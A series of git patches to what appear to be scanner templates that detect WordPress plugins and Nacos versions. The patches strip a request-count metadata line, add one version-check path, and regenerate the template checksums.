wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index cc953078eb..2d5fdf1779 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-checkout-field-editor-pro/
metadata:
- max-request: 1
plugin_namespace: woo-checkout-field-editor-pro
wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 97ce674116..6b5705e20d 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woo-variation-swatches/
metadata:
- max-request: 1
plugin_namespace: woo-variation-swatches
wpscan: https://wpscan.com/plugin/woo-variation-swatches
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index 6d05a6f058..dbcdb64bad 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-paypal-express-checkout
wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index baf5af3bb5..fb9ea502ce 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-gateway-stripe/
metadata:
- max-request: 1
plugin_namespace: woocommerce-gateway-stripe
wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 54dce49b42..1d41b4ec2c 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-payments
wpscan: https://wpscan.com/plugin/woocommerce-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 5fae796fdd..4fa6fc3ffe 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-paypal-payments/
metadata:
- max-request: 1
plugin_namespace: woocommerce-paypal-payments
wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 22f812e2b8..1c1c690fcd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
metadata:
- max-request: 1
plugin_namespace: woocommerce-pdf-invoices-packing-slips
wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index c637006d26..4d6702d81a 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce-services/
metadata:
- max-request: 1
plugin_namespace: woocommerce-services
wpscan: https://wpscan.com/plugin/woocommerce-services
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index e020507ccb..42cb8bc409 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/woocommerce/
metadata:
- max-request: 1
plugin_namespace: woocommerce
wpscan: https://wpscan.com/plugin/woocommerce
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index c92903fd79..55d6effbf5 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordfence/
metadata:
- max-request: 1
plugin_namespace: wordfence
wpscan: https://wpscan.com/plugin/wordfence
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index c25b2c1c48..6786cab703 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-importer/
metadata:
- max-request: 1
plugin_namespace: wordpress-importer
wpscan: https://wpscan.com/plugin/wordpress-importer
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 4d6dd14d25..784ba22c8a 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wordpress-seo/
metadata:
- max-request: 1
plugin_namespace: wordpress-seo
wpscan: https://wpscan.com/plugin/wordpress-seo
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 7ca0870ed6..72ff55e58a 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/worker/
metadata:
- max-request: 1
plugin_namespace: worker
wpscan: https://wpscan.com/plugin/worker
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 4f0d9be568..8cfaa0f5a9 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-fastest-cache/
metadata:
- max-request: 1
plugin_namespace: wp-fastest-cache
wpscan: https://wpscan.com/plugin/wp-fastest-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index f3c481b824..85900a01a7 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-file-manager/
metadata:
- max-request: 1
plugin_namespace: wp-file-manager
wpscan: https://wpscan.com/plugin/wp-file-manager
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index ba214fd7ea..a7ccde0b49 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-google-maps/
metadata:
- max-request: 1
plugin_namespace: wp-google-maps
wpscan: https://wpscan.com/plugin/wp-google-maps
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 8f5fe8d9a5..422664a98c 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-mail-smtp/
metadata:
- max-request: 1
plugin_namespace: wp-mail-smtp
wpscan: https://wpscan.com/plugin/wp-mail-smtp
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index 0458b13354..f0af3a748a 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-maintenance-mode/
metadata:
- max-request: 1
plugin_namespace: wp-maintenance-mode
wpscan: https://wpscan.com/plugin/wp-maintenance-mode
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index d570be07bf..f89f1a20b3 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-migrate-db/
metadata:
- max-request: 1
plugin_namespace: wp-migrate-db
wpscan: https://wpscan.com/plugin/wp-migrate-db
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index ee05e3add8..01fb12d0ad 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-multibyte-patch/
metadata:
- max-request: 1
plugin_namespace: wp-multibyte-patch
wpscan: https://wpscan.com/plugin/wp-multibyte-patch
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index df2487955f..1773857e15 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-optimize/
metadata:
- max-request: 1
plugin_namespace: wp-optimize
wpscan: https://wpscan.com/plugin/wp-optimize
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index 79ff01211c..bcd1509c68 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-pagenavi/
metadata:
- max-request: 1
plugin_namespace: wp-pagenavi
wpscan: https://wpscan.com/plugin/wp-pagenavi
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index 23414b3d1d..c6aca20a60 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-reset/
metadata:
- max-request: 1
plugin_namespace: wp-reset
wpscan: https://wpscan.com/plugin/wp-reset
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index a04ddc6003..783d381ed8 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-sitemap-page/
metadata:
- max-request: 1
plugin_namespace: wp-sitemap-page
wpscan: https://wpscan.com/plugin/wp-sitemap-page
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 2ead906817..8bdc600063 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-smushit/
metadata:
- max-request: 1
plugin_namespace: wp-smushit
wpscan: https://wpscan.com/plugin/wp-smushit
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index dedd2e23b6..ab61cc0338 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-statistics/
metadata:
- max-request: 1
plugin_namespace: wp-statistics
wpscan: https://wpscan.com/plugin/wp-statistics
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 03cd7137a8..5f6fbc1f75 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-super-cache/
metadata:
- max-request: 1
plugin_namespace: wp-super-cache
wpscan: https://wpscan.com/plugin/wp-super-cache
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index a68d4b7d78..d67150d038 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wp-user-avatar/
metadata:
- max-request: 1
plugin_namespace: wp-user-avatar
wpscan: https://wpscan.com/plugin/wp-user-avatar
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index bf9dfc3ad8..beeba7ca69 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-recaptcha/
metadata:
- max-request: 1
plugin_namespace: wpcf7-recaptcha
wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index 47911a86a5..c225df7bfd 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpcf7-redirect/
metadata:
- max-request: 1
plugin_namespace: wpcf7-redirect
wpscan: https://wpscan.com/plugin/wpcf7-redirect
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index 1c25b6f488..aaad04cb76 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpforms-lite/
metadata:
- max-request: 1
plugin_namespace: wpforms-lite
wpscan: https://wpscan.com/plugin/wpforms-lite
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index b36317acd8..ff750a7d2a 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wps-hide-login/
metadata:
- max-request: 1
plugin_namespace: wps-hide-login
wpscan: https://wpscan.com/plugin/wps-hide-login
tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index 5eb35dd17e..f1e7595ccd 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/wpvivid-backuprestore/
metadata:
- max-request: 1
plugin_namespace: wpvivid-backuprestore
wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index ceb2b8d600..4b2769ee46 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,7 +7,6 @@ info:
reference:
- https://wordpress.org/plugins/yith-woocommerce-wishlist/
metadata:
- max-request: 1
plugin_namespace: yith-woocommerce-wishlist
wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
tags: tech,wordpress,wp-plugin,top-100,top-200
From b5024f133a0b6a2b0a0ee0d93c4db4b131589bc2 Mon Sep 17 00:00:00 2001
From: J4vaovo <128683738+j4vaovo@users.noreply.github.com>
Date: Sat, 24 Jun 2023 20:57:57 +0800
Subject: [PATCH 520/670] Update nacos-version.yaml (#7527)
---
http/technologies/nacos-version.yaml | 1 +
1 file changed, 1 insertion(+)
diff --git a/http/technologies/nacos-version.yaml b/http/technologies/nacos-version.yaml
index fdd4f75f34..2cd2ef56f1 100644
--- a/http/technologies/nacos-version.yaml
+++ b/http/technologies/nacos-version.yaml
@@ -20,6 +20,7 @@ http:
- method: GET
path:
- "{{BaseURL}}/v1/console/server/state?accessToken=&username="
+ - "{{BaseURL}}/nacos/v1/console/server/state?accessToken=&username="
matchers-condition: and
matchers:
From fe6693271a0b13731ea55f8973b8bc32039aec71 Mon Sep 17 00:00:00 2001
From: GitHub Action
Date: Sat, 24 Jun 2023 12:58:40 +0000
Subject: [PATCH 522/670] Auto Generated Templates Checksum [Sat Jun 24
12:58:40 UTC 2023] :robot:
---
templates-checksum.txt | 408 ++++++++++++++++++++---------------------
1 file changed, 204 insertions(+), 204 deletions(-)
diff --git a/templates-checksum.txt b/templates-checksum.txt
index dbb1525fd2..8855752391 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -236,7 +236,7 @@ helpers/wordpress/plugins/facebook-for-woocommerce.txt:136e0602de6fdd3ca4ce18b9a
helpers/wordpress/plugins/fast-indexing-api.txt:7fc90060ab7493dc709f0e0cbc6ae3ca7204a614
helpers/wordpress/plugins/favicon-by-realfavicongenerator.txt:08d2e98e6754af941484848930ccbaddfefe13d6
helpers/wordpress/plugins/flamingo.txt:98a16af997b52cb888232ab5d79a527b0716561c
-helpers/wordpress/plugins/fluentform.txt:73b8603e920872b1a0062cf945de2d7b64e30cb6
+helpers/wordpress/plugins/fluentform.txt:e5860a503f887acf2646c5b0c2eac8a595bac9fb
helpers/wordpress/plugins/font-awesome.txt:f4bf33bfd9c3793655f2a19fca0ee1ca41e62e6e
helpers/wordpress/plugins/force-regenerate-thumbnails.txt:32fecb37588747cdb8227230edc41ff2ca6557e1
helpers/wordpress/plugins/formidable.txt:e0e8632bccfe7cb1511a277abb9bd5fbc2e087a6
@@ -329,7 +329,7 @@ helpers/wordpress/plugins/svg-support.txt:89941265e418c7729912b574c9b29eff77c5b1
helpers/wordpress/plugins/table-of-contents-plus.txt:40bf252ebc68d2921a7e909064c29fd95a1820fb
helpers/wordpress/plugins/tablepress.txt:8bff12eeb621c3f4c18ae1d2809b3860778910f4
helpers/wordpress/plugins/taxonomy-terms-order.txt:92c6bf6bc1f97136cb8bbe1a936cc4289dff178e
-helpers/wordpress/plugins/the-events-calendar.txt:5661ec9d748ff7fd63a65f26250276618fade1e7
+helpers/wordpress/plugins/the-events-calendar.txt:1d262444e1b31be97e0a0a87e22c14ff2b5da051
helpers/wordpress/plugins/themeisle-companion.txt:488784591515bd4cdaa016be4ec9b172dc4e7caf
helpers/wordpress/plugins/tinymce-advanced.txt:e00602f1c349065df0c9ef24dec6d03c9f5a1ecf
helpers/wordpress/plugins/translatepress-multilingual.txt:89941265e418c7729912b574c9b29eff77c5b172
@@ -5167,7 +5167,7 @@ http/technologies/mongoose-server.yaml:80820020bb7e8c6bc6e3fb04c48fb85609625d9e
http/technologies/monstracms-detect.yaml:fb3cc6ca939b7e7de438a679dad2e319b565196b
http/technologies/moveit-transfer-detect.yaml:c5f47883b00a8d1a44099bf218e81ad46b3c16bd
http/technologies/mrtg-detect.yaml:6248e2f9fa7f6243e91b4348bf6e2627af1c7513
-http/technologies/nacos-version.yaml:49d2f38ef4dae7ca1283abbfc8c730849d8036a0
+http/technologies/nacos-version.yaml:c662c60fae962bd6e94a5fc983fae12748da33db
http/technologies/neos-detect.yaml:6fa3c73066cb99e7c55ebccd3a0d4ddf6e28c7c2
http/technologies/netsweeper-webadmin-detect.yaml:c415f210db99b49ef0eb490bdfa2a440f67e508f
http/technologies/nextcloud-detect.yaml:0c47f78f2b379f7e93168520ab3a140894456a47
@@ -5294,213 +5294,213 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
-http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
+http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
+http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:9f506de2bcca6885f35c46248b4504aaad538724
-http/technologies/wordpress/plugins/akismet.yaml:b007755cc48a7a531a0e8fa3c452f9f74b483a5c
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:8afc7d83bef5b26cba75228a1713dfa60348deba
-http/technologies/wordpress/plugins/all-in-one-seo-pack.yaml:0010ec5c05b69f5ebddee94a9ce0d4b57e44ff27
-http/technologies/wordpress/plugins/all-in-one-wp-migration.yaml:c3da676f6d0fa160cc7394abf4c7d8daf4f0fe96
-http/technologies/wordpress/plugins/all-in-one-wp-security-and-firewall.yaml:f06de6db272be3eaa03e68865e41fd8cd0889d6e
-http/technologies/wordpress/plugins/amp.yaml:6e95aadb383bc37245be179768ef3666595c84d4
-http/technologies/wordpress/plugins/antispam-bee.yaml:cbc2eb83f595229655ccae5e68e201f8fbbdfc3f
-http/technologies/wordpress/plugins/astra-sites.yaml:88922bff5ff8b290d2e3d0dff8a85a3a3b71be07
-http/technologies/wordpress/plugins/astra-widgets.yaml:ae52d4e01aa55255f0351c2ebf24e5f6a05f46c1
-http/technologies/wordpress/plugins/autoptimize.yaml:279ce12aeb07a219ddde6d8d3b8bdfe7854b545c
-http/technologies/wordpress/plugins/backwpup.yaml:cd98534e9f211629ba533369d19b35889d667dff
-http/technologies/wordpress/plugins/better-search-replace.yaml:f0fb1b87ddb8ba11b1b34fc352dcfe60ec8bd32a
-http/technologies/wordpress/plugins/better-wp-security.yaml:366bc515c9eea0caf24103811f783af87309bc1e
-http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:cf370287b480191433f14d22645180352e012309
-http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:1d9ebeb7f6912abd70c1d5ff211c9bc312e8437c
-http/technologies/wordpress/plugins/breeze.yaml:c9d3a0b31311eeb12035b292ea0beb6de100161d
-http/technologies/wordpress/plugins/broken-link-checker.yaml:3632271104d26b8bca780450cc8bda6c00a2904a
-http/technologies/wordpress/plugins/child-theme-configurator.yaml:3346ba95537fd3c405732fb81d7d459a22cd7eae
-http/technologies/wordpress/plugins/classic-editor.yaml:7eac99fe2332bcd2d61540094502911352f9b299
-http/technologies/wordpress/plugins/classic-widgets.yaml:e5b45b37d0a85fd0e54c21716ca57f5ade443aa7
-http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:9e23b288bbe247ec7fc8a1ee5be22e37886f5fd9
-http/technologies/wordpress/plugins/cloudflare.yaml:66dcdb39cea465cbf038ff429f48620493d09369
-http/technologies/wordpress/plugins/cmb2.yaml:eb137984c82ed5d64c29685b14a6c20d443be844
-http/technologies/wordpress/plugins/coblocks.yaml:0b67f9d55e292e698889ac4b63809c2468d3ed2c
-http/technologies/wordpress/plugins/code-snippets.yaml:69feff2b5e8275ebd75f53eff59ee2a912f26636
-http/technologies/wordpress/plugins/coming-soon.yaml:679f3b88eb2da31b32e3180cceccd25d7f60e86e
-http/technologies/wordpress/plugins/complianz-gdpr.yaml:35ff2d819699fc3c4d35d44702d09ec841fdb61d
-http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:81b00a965871cb891ebfbbc4a1368692c89c106a
-http/technologies/wordpress/plugins/contact-form-7.yaml:ed800082cc23cf6479f6cc46302bbf76f3a514ef
-http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:a54ed3ad529d498c2c8b8c0d46b2794a2a729e4f
-http/technologies/wordpress/plugins/cookie-law-info.yaml:3bd4cc6049acf423c429e570491594ff3b5007a7
-http/technologies/wordpress/plugins/cookie-notice.yaml:198f4bf51ae86e3bbea603b127caca8f2e5a9057
-http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:373d91b4dd303509b7cab8348231294d9ea8cbb3
-http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:2b73cbbc4598fa9184ea8d3c52b166fc6fee1459
-http/technologies/wordpress/plugins/custom-css-js.yaml:b6291ea7e296f32148ed13099711f9c9f0a2f3ad
-http/technologies/wordpress/plugins/custom-fonts.yaml:45b1c43ca8b833a6d10518e214d69e9c87e3282c
-http/technologies/wordpress/plugins/custom-post-type-ui.yaml:15eff4815c8fec2b7907295243812d1f51b1697f
-http/technologies/wordpress/plugins/disable-comments.yaml:b7fbaf360dc5246357ccdc9e819d384238cddbb7
-http/technologies/wordpress/plugins/disable-gutenberg.yaml:6af6a0b5b5d096f9563c30a4fd20e0cff5ae03d0
-http/technologies/wordpress/plugins/duplicate-page.yaml:aadea56bc4af197b7e6a6c3f374358b6e0af09af
-http/technologies/wordpress/plugins/duplicate-post.yaml:81174cfbdf40b99a59b5d60a4451a7124506825a
-http/technologies/wordpress/plugins/duplicator.yaml:f8cffcb16fc6b08355823d28e32a79daa7549677
-http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d855708559e81537cb85f5acc6bace4c0d4b3121
-http/technologies/wordpress/plugins/easy-fancybox.yaml:e41968a186a45de3a74a86d93ee1967c67ce7984
-http/technologies/wordpress/plugins/easy-google-fonts.yaml:7f9b02d3513ca7ddbcb4bf0c320b049328a8bc45
-http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d4e688094d6176459fa903f03e5794848ed3e201
-http/technologies/wordpress/plugins/easy-wp-smtp.yaml:2ff0f61226aa4cb1038d1deadb00b628fb11fcab
